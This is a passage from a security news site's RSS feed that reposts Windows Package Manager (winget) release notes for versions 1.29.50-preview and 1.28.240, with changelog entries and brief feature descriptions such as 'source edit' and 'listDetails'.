<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/doterik/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/doterik">@doterik</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3725749076" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5924" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5924/hovercard" href="https://github.com/microsoft/winget-cli/pull/5924">#5924</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/microsoft/winget-cli/compare/v1.11.400...v1.28.220"><tt>v1.11.400...v1.28.220</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows Package Manager 1.29.50-preview]]></title>
<description><![CDATA[This is a preview build of WinGet for those interested in trying out upcoming features and fixes. While it has had some use and should be free of major issues, it may have bugs or usability problems. If you find any, please help us out by filing an issue.
New in v1.29

What's Changed

PowerShell ...]]></description>
<link>https://tsecurity.de/de/3601258/downloads/windows-package-manager-12950-preview/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601258/downloads/windows-package-manager-12950-preview/</guid>
<pubDate>Tue, 16 Jun 2026 11:31:54 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is a preview build of WinGet for those interested in trying out upcoming features and fixes. While it has had some use and should be free of major issues, it may have bugs or usability problems. If you find any, please help us out by <a href="https://github.com/microsoft/winget-cli/issues">filing an issue</a>.</p>
<h2>New in v1.29</h2>

<h2>What's Changed</h2>
<ul>
<li>PowerShell Repair enhancements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AmelBawa-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AmelBawa-msft">@AmelBawa-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3395519393" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5711" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5711/hovercard" href="https://github.com/microsoft/winget-cli/pull/5711">#5711</a></li>
<li>Allow inproc callers to disable termination signal handlers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3789855368" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5958" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5958/hovercard" href="https://github.com/microsoft/winget-cli/pull/5958">#5958</a></li>
<li>Add manifest version to WinGetUtilInterop by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/msftrubengu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/msftrubengu">@msftrubengu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3794767294" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5964" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5964/hovercard" href="https://github.com/microsoft/winget-cli/pull/5964">#5964</a></li>
<li>Fixes for updating winget from winget by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3806959508" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5972" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5972/hovercard" href="https://github.com/microsoft/winget-cli/pull/5972">#5972</a></li>
<li>Diagnostics and fix for pipeline test failures by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3810295053" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5975" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5975/hovercard" href="https://github.com/microsoft/winget-cli/pull/5975">#5975</a></li>
<li>Escape caller in user agent header by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3840346247" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5998" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5998/hovercard" href="https://github.com/microsoft/winget-cli/pull/5998">#5998</a></li>
<li>Add DSC resource list to manifest by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3839410468" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5997" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5997/hovercard" href="https://github.com/microsoft/winget-cli/pull/5997">#5997</a></li>
<li>Add command builder with escaped user input by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AmelBawa-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AmelBawa-msft">@AmelBawa-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3817973099" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5982" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5982/hovercard" href="https://github.com/microsoft/winget-cli/pull/5982">#5982</a></li>
<li>Add missing closing brace in settings.export.schema.0.1.json by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DuckDuckStudio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DuckDuckStudio">@DuckDuckStudio</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3853198617" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6004" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6004/hovercard" href="https://github.com/microsoft/winget-cli/pull/6004">#6004</a></li>
<li>Turn off PWSH UT build in Fuzzing and ReleaseStatic for all platforms by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AmelBawa-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AmelBawa-msft">@AmelBawa-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3857311162" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6005" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6005/hovercard" href="https://github.com/microsoft/winget-cli/pull/6005">#6005</a></li>
<li>Remove experimental feature gate on source edit by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3857921476" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6006" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6006/hovercard" href="https://github.com/microsoft/winget-cli/pull/6006">#6006</a></li>
<li>Update ReleaseNotes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3862674095" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6007" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6007/hovercard" href="https://github.com/microsoft/winget-cli/pull/6007">#6007</a></li>
<li>Make list details stable by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3888464623" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6020" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6020/hovercard" href="https://github.com/microsoft/winget-cli/pull/6020">#6020</a></li>
<li>Move to IReference rather than custom enum for optional bool by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3892646118" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6022" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6022/hovercard" href="https://github.com/microsoft/winget-cli/pull/6022">#6022</a></li>
<li>Apply latest loc patch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3893629466" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6023" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6023/hovercard" href="https://github.com/microsoft/winget-cli/pull/6023">#6023</a></li>
<li>Bump version to 1.29 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3888315257" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6019" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6019/hovercard" href="https://github.com/microsoft/winget-cli/pull/6019">#6019</a></li>
<li>Remove 'listDetails' from release notes for 1.29 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3893739947" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6026" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6026/hovercard" href="https://github.com/microsoft/winget-cli/pull/6026">#6026</a></li>
<li>Update doc as WinGet is not in preview by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gijsreyn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gijsreyn">@Gijsreyn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3572990820" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5850" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5850/hovercard" href="https://github.com/microsoft/winget-cli/pull/5850">#5850</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/microsoft/winget-cli/compare/v1.28.110-preview...v1.29.50-preview"><tt>v1.28.110-preview...v1.29.50-preview</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows Package Manager 1.28.240]]></title>
<description><![CDATA[This is a servicing release of Windows Package Manager v1.28. If you find any bugs or problems, please help us out by filing an issue.
New in v1.28

Bumped the winget version to 1.28 to match the package version.
Additional options for limiting the size of log files.

New Feature: 'source edit'
N...]]></description>
<link>https://tsecurity.de/de/3601255/downloads/windows-package-manager-128240/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601255/downloads/windows-package-manager-128240/</guid>
<pubDate>Tue, 16 Jun 2026 11:31:50 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is a servicing release of Windows Package Manager v1.28. If you find any bugs or problems, please help us out by <a href="https://github.com/microsoft/winget-cli/issues">filing an issue</a>.</p>
<h2>New in v1.28</h2>
<ul>
<li>Bumped the winget version to 1.28 to match the package version.</li>
<li>Additional <a href="https://github.com/microsoft/winget-cli/blob/master/doc/Settings.md#file">options for limiting the size of log files</a>.</li>
</ul>
<h1>New Feature: 'source edit'</h1>
<p>New feature that adds an 'edit' subcommand to the 'source' command. This can be used to set an explicit source to be implicit and vice-versa. For example, with this feature you can make the 'winget-font' source an implicit source instead of explicit source.</p>
<p>To use the feature, try <code>winget source edit winget-font</code> to set the Explicit state to the default.</p>
<h1>New Experimental Feature: 'listDetails'</h1>
<p>The new experimental feature <code>listDetails</code> enables a new option for the <code>list</code> command, <code>--details</code>.  When supplied, the output is no longer a table view of the results but is instead a series of <code>show</code> like outputs drawing data from the installed item.</p>
<p>An example output for a single installed package is:</p>
<div class="highlight highlight-source-powershell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="&gt; wingetdev list Microsoft.VisualStudio.2022.Enterprise --details
Visual Studio Enterprise 2022 [Microsoft.VisualStudio.2022.Enterprise]
Version: 17.14.21 (November 2025)
Publisher: Microsoft Corporation
Local Identifier: ARP\Machine\X86\875fed29
Product Code: 875fed29
Installer Category: exe
Installed Scope: Machine
Installed Location: C:\Program Files\Microsoft Visual Studio\2022\Enterprise
Available Upgrades:
  winget [17.14.23]"><pre><span class="pl-k">&gt;</span> wingetdev list Microsoft.VisualStudio.<span class="pl-c1">2022.</span>Enterprise <span class="pl-k">--</span>details
Visual Studio Enterprise <span class="pl-c1">2022</span> [<span class="pl-k">Microsoft.VisualStudio.2022.Enterprise</span>]
Version: <span class="pl-c1">17.14</span>.<span class="pl-c1">21</span> (November <span class="pl-c1">2025</span>)
Publisher: Microsoft Corporation
Local Identifier: ARP\Machine\X86\875fed29
Product Code: 875fed29
Installer Category: exe
Installed Scope: Machine
Installed Location: C:\Program Files\Microsoft Visual Studio\<span class="pl-c1">2022</span>\Enterprise
Available Upgrades:
  winget [<span class="pl-c1">17.14</span>.<span class="pl-c1">23</span>]</pre></div>
<p>If sixels are enabled and supported by the terminal, an icon for the installed package will be shown.</p>
<p>To enable this feature, add the 'listDetails' experimental feature to your settings.</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content='"experimentalFeatures": {
    "listDetails": true
},'><pre class="notranslate"><code>"experimentalFeatures": {
    "listDetails": true
},
</code></pre></div>
<h2>Bug Fixes</h2>
<ul>
<li>Portable Packages now use the correct directory separators regardless of which convention is used in the manifest</li>
<li><code>--suppress-initial-details</code> now works with <code>winget configure test</code></li>
<li><code>--suppress-initial-details</code> no longer requires <code>--accept-configuration-agreements</code></li>
<li>Corrected property of <code>Font</code> experimental feature to accurately reflect <code>fonts</code> as the required setting value</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>Update the other TDBuild task by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3151652738" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5534" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5534/hovercard" href="https://github.com/microsoft/winget-cli/pull/5534">#5534</a></li>
<li>Use windows-latest agents in localization pipeline by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3154579970" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5538" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5538/hovercard" href="https://github.com/microsoft/winget-cli/pull/5538">#5538</a></li>
<li>Bump version to v1.12 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3151371086" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5532" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5532/hovercard" href="https://github.com/microsoft/winget-cli/pull/5532">#5532</a></li>
<li>Allow set foreground from PS by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3154984365" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5541" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5541/hovercard" href="https://github.com/microsoft/winget-cli/pull/5541">#5541</a></li>
<li>Move to proper signal for dev/not-dev by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3169763143" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5552" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5552/hovercard" href="https://github.com/microsoft/winget-cli/pull/5552">#5552</a></li>
<li>Use SDK 26100 in CommonCore project by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3200120927" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5570" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5570/hovercard" href="https://github.com/microsoft/winget-cli/pull/5570">#5570</a></li>
<li>Repair Repair-WinGetPackageManager by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3197628230" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5568" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5568/hovercard" href="https://github.com/microsoft/winget-cli/pull/5568">#5568</a></li>
<li>Use cpprestsdk v2.10.18 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3197577111" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5567" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5567/hovercard" href="https://github.com/microsoft/winget-cli/pull/5567">#5567</a></li>
<li>Undefined-behaviour fix: safely call std::isspace in CompletionData by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mohiuddin-khan-shiam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mohiuddin-khan-shiam">@mohiuddin-khan-shiam</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3186146724" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5564" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5564/hovercard" href="https://github.com/microsoft/winget-cli/pull/5564">#5564</a></li>
<li>Add missing compilation flags for vcpkg ports by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3224397023" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5587" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5587/hovercard" href="https://github.com/microsoft/winget-cli/pull/5587">#5587</a></li>
<li>Add more missing flags for vcpkg by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3237619990" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5592" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5592/hovercard" href="https://github.com/microsoft/winget-cli/pull/5592">#5592</a></li>
<li>Swallow provisioned package errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3240833652" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5595" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5595/hovercard" href="https://github.com/microsoft/winget-cli/pull/5595">#5595</a></li>
<li>Update detours vcpkg to use prior version by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3244916547" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5601" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5601/hovercard" href="https://github.com/microsoft/winget-cli/pull/5601">#5601</a></li>
<li>Remove TestRelease by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3253760151" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5613" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5613/hovercard" href="https://github.com/microsoft/winget-cli/pull/5613">#5613</a></li>
<li>Handle Byte Order Mark during validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3220923892" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5585" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5585/hovercard" href="https://github.com/microsoft/winget-cli/pull/5585">#5585</a></li>
<li>Initial MCP Server implementation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3250446710" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5610" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5610/hovercard" href="https://github.com/microsoft/winget-cli/pull/5610">#5610</a></li>
<li>Update release notes for BOM Handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3264891691" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5622" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5622/hovercard" href="https://github.com/microsoft/winget-cli/pull/5622">#5622</a></li>
<li>Don't build MCP for fuzzing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3267257548" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5625" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5625/hovercard" href="https://github.com/microsoft/winget-cli/pull/5625">#5625</a></li>
<li>Resolve nuget package graph for .NET projects together by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3274445183" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5627" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5627/hovercard" href="https://github.com/microsoft/winget-cli/pull/5627">#5627</a></li>
<li>Update to latest MCP nuget by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3284768501" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5633" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5633/hovercard" href="https://github.com/microsoft/winget-cli/pull/5633">#5633</a></li>
<li>Update release notes to mention WinUI dependency change by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3315786475" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5656" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5656/hovercard" href="https://github.com/microsoft/winget-cli/pull/5656">#5656</a></li>
<li>Improve COM server quiescing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3311253541" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5652" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5652/hovercard" href="https://github.com/microsoft/winget-cli/pull/5652">#5652</a></li>
<li>Improve issue forms &amp; add corresponding label triggers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mdanish-kh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mdanish-kh">@mdanish-kh</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3319838802" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5661" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5661/hovercard" href="https://github.com/microsoft/winget-cli/pull/5661">#5661</a></li>
<li>Fix conflict with issue forms by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3320119960" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5663" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5663/hovercard" href="https://github.com/microsoft/winget-cli/pull/5663">#5663</a></li>
<li>Improve COM static store usage by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3346435528" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5680" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5680/hovercard" href="https://github.com/microsoft/winget-cli/pull/5680">#5680</a></li>
